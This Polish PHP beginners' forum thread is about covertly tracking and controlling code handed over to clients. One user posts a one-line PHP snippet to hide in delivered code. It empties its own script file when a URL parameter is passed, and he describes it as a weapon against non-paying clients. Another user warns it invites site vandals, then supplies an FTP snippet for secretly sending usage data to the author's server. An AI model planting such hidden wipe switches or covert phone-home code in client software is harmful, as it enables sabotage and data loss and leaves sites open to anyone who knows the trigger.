Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [php] Przeslanie zmiennej do php na innym serwerze
Forum PHP.pl > Forum > Przedszkole
gomu
Hello,
ma to byc zabezpieczenie mojego kodu przed rozpowszechnianiem, chcialbym zeby string z URLem, przeslany zostal do pliku php na moim serwerze, podczas gdy sam skrypt wysylajacy znajdowal by sie na obcym, blizej nei okreslonym serwie, w ten sposob widzial bym kto i na jakim serwerze korzysta z mojego kodu....
jestem blado zielony w php wiec prosze o pomoc w konstrukcji....
Prym
szczerze mówiąc to takie rozwiązanie jest dość męczące dla klienta. jesli nie posiadasz własnego szybkiego serwera na którym będziesz miał swoje skrypty to przyblokujesz strony swoich klientów - piszę tak bo aktualnie mam własnie taki rodzynek gosc sie zwrocił do mnie o napisanie serwisu bo to czego uzywa poprostu go denerwuje i własnie sie okazało ze jego aktualna strona bazuje na czyms takim jak piszesz. ja osobiscie podchodzę do sprawy kodu w inny sposob - staram sie zabezpieczyć/ac możliwość dostępu do serwera przez programy zasysające serwisy (w pliku .htaccess wpisujesz odpowiednie linijki i takie programy juz nie bedą mogły pobrać twojego skryptu). i ogolnie jesli ktoś będzie chciał "pożyczyć" twoj skrypt to zawsze znajdzie sposób.

ups zapomniałem o przykladowym kodzie w apachu:
taki przyklad dla teleporta
Kod
RewriteCond %{HTTP_USER_AGENT} Teleport [NC,OR]
RewriteRule .* - [F,L]
gomu
wiesz, nie dokladnie o to mi chodzi, chce miec mozliwosc zlokalizowania mojego produktu (strony/kodu) po przekazaniu jej "klientowi"
juz napisalem warunkowa instrukcje, ktora po dodaniu do URLa ?1=1 wyczysci strone, jesli klient nie zmienie chmoda....

Kod
<?$u=$_SERVER['SCRIPT_URI'];$f=basename($u);if($_GET['1']==1){if(is_writeable($f)){if($p=fopen($f,"w+")){if(fwrite($p,"")!==FALSE)echo"OK";fclose($p);};};}?>

Ale co po takim skrypcie, skoro nie bede mogl zlokalizowac mojej strony, potrzebuje czegos co bedzie do pliku php na moim serwerze przekazywac informacje o swojej lokalizacji smile.gif

Zmyślnie i fikuśnie, bacik na nie placacego klienta...

odkrylem ze jesli zmienie
($_GET['1']==1)
na
($_GET['0']==0)

to po jednokrotnym przeladowaniu strona ulegnie kasacji, przydatne jesli chcemy zamiescic w sieci na chwile jakies dane i szybko je skasowac bez wchodzenia na FTP
Prym
aha. ogolnie jak rozumiem taki kod ci jest potrzebny do momentu zapłaty przez klienta daniny winksmiley.jpg a potem go usuwasz z kodu finalnego? bo jakby nie patrzec jest to piekna bramka dla jakiego maniaka niszczenia stron.

ogolnie jesli chodzi ci o demonstrowanie postepow prac to ja proponuje wykupic sobie jakis serwerek na którym bedziesz prezentował postepy prac - dodajesz subdomene i po klopocie - masz wtedy nad tym pełna władzę.

jesli nie to oczywiscie za kazdym odpaleniem skryptu mozesz za kazdym odpaleniem łopatologicznie połaczyć sie z ftp (ftp_connect) twjego serwera i zapisać interesujace cię informacje (czyli skrypt generuje sobie dane i zapisuje np do pliku csv z data dzisiejsza z odpowiednimi znakami podziału zeby mozna bylo sobie ladnie je odczytac - problem jest tki ze musisz w skrypcie podać dane logowania do twojego serwera - inne j możliwości zapisu danych na innym serwerze niz ten z ktorego skrypt odpalasz ja nie znam
gomu
no wlasnie tez tak myslalem, ze bedzie problem z wyslaniem czegokolwiek do innego serwera... jak bedzie wygldal modul odbierania tych informacji wyslanych przez ftp_connect()? to w ogole bedzie php jeszcze?

wiesz nie zaszkodzi jak nawet w wersji finalnej sobie ten skrypcik pozostanie, byle nie zamulal za bardzo...
Prym
co do mulenia to zalezy od łaczy miedzy serwkami jak ci bedzie sie łaczyl miedzy usa i polskim to peewnie to odczujesz winksmiley.jpg

co do ftp to dalej jest php bardzo dobra instrukcja : Wszystko ftp w php

oczywiscie przed tym musisz zapisac plik z danymi na serwerku skryptu (potem sobie go unlinkujesz)

1. <?php
  2. $ftpserw = ftp_connect(nazwa_serwftp); // łaczysz z serwkiem
  3. if ($ftpserw) {
  4.  $logowanie = ftp_login($ftpserw, 'login', ''haslo'); //logujesz
  5.  if ($logowanie) {
  6.  $dane = ftp_put($ftpserw, 'pliczek docelowy', 'pliczek do przeslania, FTP_BINARY); //przesyłasz 
  7. if ($dane ) {echo "wysłane";} else { echo "bład"; } // to chyba jasne
  8. }
  9. ftp_quit($ftpserw); // zamykasz lacze 
  10. }
  11. ?>

to tak na szybko bo ciut zajety jestem winksmiley.jpg

tak dodam odbior danych to jedynie porpzez skrypt na twoim serwerku przy pomocy fopen z plikow txt
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.